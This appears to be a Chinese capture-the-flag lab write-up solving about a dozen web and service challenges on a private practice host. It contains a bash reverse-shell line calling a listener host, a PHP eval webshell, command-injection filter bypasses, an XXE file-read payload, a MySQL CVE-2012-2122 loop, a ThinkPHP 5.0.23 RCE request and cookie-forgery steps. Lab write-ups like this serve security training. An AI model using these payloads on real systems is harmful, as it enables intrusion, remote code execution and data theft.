redis一键利用工具

工具
下完要去RedisModulesSDK/文件夹make一下
(vpn分配的是虚拟网卡的ip)

反弹shell

先本地写个shell

1
bash -c "bash -i >& /dev/tcp/192.168.198.48/404 0>&1"

然后本地开一个http服务

让redis下载本地shell

监听,反弹shell

练习

http://10.3.4.96:10011/ (爆破)

http://10.3.4.96:10012 (文件包含)

直接data协议写shell了

1
http://10.3.4.96:10012/?demo=data://text/plain,<?=eval($_POST[1]);?>

然后post传参

1
1=system('tac fl4gisisish3r3.php');

http://10.3.4.96:10013/ (命令执行)

空格被过滤,用%09绕过

1
ip=127.0.0.1%7Ctac%09/f41ag

http://10.3.4.96:10014/ (文件上传)

服务端遇到php会替换为空,可以双写绕过

然后执行命令

http://10.3.4.96:10015/ (xxe)

文件读取

1
2
3
4
5
6
7
8
<?xml version='1.0'?>
<!DOCTYPE a [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.php">
]>
<user>
<username>&xxe;</username>
<password>admin</password>
</user>


10.3.4.96:10016 (mysql)

fscan扫出来

法一:打cve-2012-2122

那就打cve-2012-2122

1
for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.3.4.96 -P10016 ;done



然后直接读数据库里的flag

法二:fscan爆破密码

1
./fscan -h 10.3.4.96:10016 -m mysql

扫出弱口令

然后直接登录数据库就行

http://10.3.4.96:10017/ (think v5.0.23)

照着poc打就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /index.php?s=captcha HTTP/1.1

Host: 10.3.4.96:10017

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 79



_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

http://10.3.4.96:10018 (纯签到题)

http://10.3.4.96:10019 (越权)

直接构造admin然后base64编码就行
然后进入到admin.php
然后就是命令执行,用$IFS$9绕过空格过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /admin.php HTTP/1.1

Host: 10.3.4.96:10019

Content-Length: 18

Cache-Control: max-age=0

Origin: http://10.3.4.96:10019

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://10.3.4.96:10019/admin.php

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=bcc3b4ac1805bafbe5b16a325fface99; user=dXNlcg%3D%3D

Connection: keep-alive



cmd=cat$IFS$9/f14g

http://10.3.4.96:10020/ (任意文件下载)

dirsearch扫到有个db.php
有个下载功能

1
http://10.3.4.96:10020/down.php?path=db.php

直接下载

扫目录发现有个/phpmyadmin
然后直接用这个账号和密码登录找到flag